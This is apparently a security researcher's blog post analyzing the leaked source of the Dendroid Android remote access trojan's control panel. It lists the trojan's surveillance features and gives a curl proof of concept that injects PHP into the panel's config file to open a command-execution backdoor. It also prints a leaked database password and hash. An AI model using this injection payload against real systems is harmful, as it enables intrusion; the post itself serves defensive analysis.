On Friday, the full source code of the Dendroid Remote Access Trojan (RAT) was leaked. Dendroid is a popular crimeware package that targets Android devices and is sold on underground forums for $300. Usually the source code for botnet control panels is encrypted, so it was surprising to find the full source code for the Dendroid control panel included in the leaked files. Analyzing the leaked code revealed multiple vulnerabilities due to a lack of user input validation including Cross-Site Scripting (XSS), Arbitrary File Upload, SQL Injection, and PHP Code Execution.
The Dendroid crimeware kit includes an application package file (APK) builder and a website panel to control infected devices. The builder allows the attacker to easily incorporate the Dendroid RAT into legitimate Android apps. There are multiple actions the botnet master can enact on a Dendroid-infected device including:
- Downloading and uploading of files
- Controlling the camera and microphone
- Intercepting and/or blocking SMS texts
- Accessing browser data (history/bookmarks)
- Harvesting call data, contacts, etc.
- Opening installed applications
The lack of user input validation in Dendroid's control panel is severe, especially when you consider the level of operational security needed in even smaller crimeware campaigns.
Unsanitized user input is written to the Panel/config.php file via POST requests to the Panel/applysettings.php file. This vulnerability allows PHP code to be injected and then executed with subsequent requests at the Panel/config.php URL. Rewriting this configuration file will not only allow execution of specially crafted PHP code, but will also render the control panel inept, effectively creating a Denial of Service condition.
Here is one proof of concept that passes the GET parameter “c" for system command execution:
curl -d“timezone=%27%3B%24s%3D%24_GET%5B%27c%27%5D%3Bsystem%28%24s%29%3Bdie%28%29%3B%24s%3D%27"
-d “postboxsize=1" -d “botoffline=1" ‘dendroid.local/Panel/applysettings.php'
Let's break down each of these POST parameters to show what they do. Curl is instructed to send a POST request for the timezone parameter with the URL encoded string:
';$s=$_GET['c'];system($s);die();$s='
This POST value will subsequently be written to the Panel/config.php on line 13 with compiler happy code:
$timezonesetting='';$s=$_GET['c'];system($s);die();$s='';
The other POST values postboxsize and botoffline are assigned expected integer values so PHP does not throw any errors. Our post exploit Panel/config.php file now contains the contents below. Notice that the database connection information (dbhost, dbname, etc.) was overwritten which stops the control panel from functioning:
$dbhost=''; $dbname=''; $dbuser=''; $dbpass='satu5ama3'; $username=''; $password='74dfc2b27acfa364da55f93a5caee29ccad3557247eda238831b3e9bd931b01d77fe994e4f12b9d4cfa92a124461d2065197d8cf7f33fc88566da2db2a4d6eae'; $postboxtextsize=1; $devicestablerefreshspeed=0; $filestablerefreshspeed=0; $messageboxrefreshspeed=0; $offlineminutes=1; $timezonesetting='';$s=$_GET['c'];system($s);die();$s=''; $autoscrolltextbox=false; ?>
And now the backdoor shell can be accessed by issuing system commands to the POST “c" parameter:
Example using "whoami" system command
In the past, malware source code leaks have spawned several variants and led to more widespread use of the crimeware features that made the original malware desirable. When the source code for Zeus Trojan was leaked in 2011, for example, it accelerated the proliferation of features designed to bypass online banking security measures.
Based on the quality of the source code, it's clear that Dendroid is not on par with Zeus or other advanced Trojans. That being said, it would be very surprising if the Dendroid leak does not lead to more widespread use of the Android-based malware and its future variants.
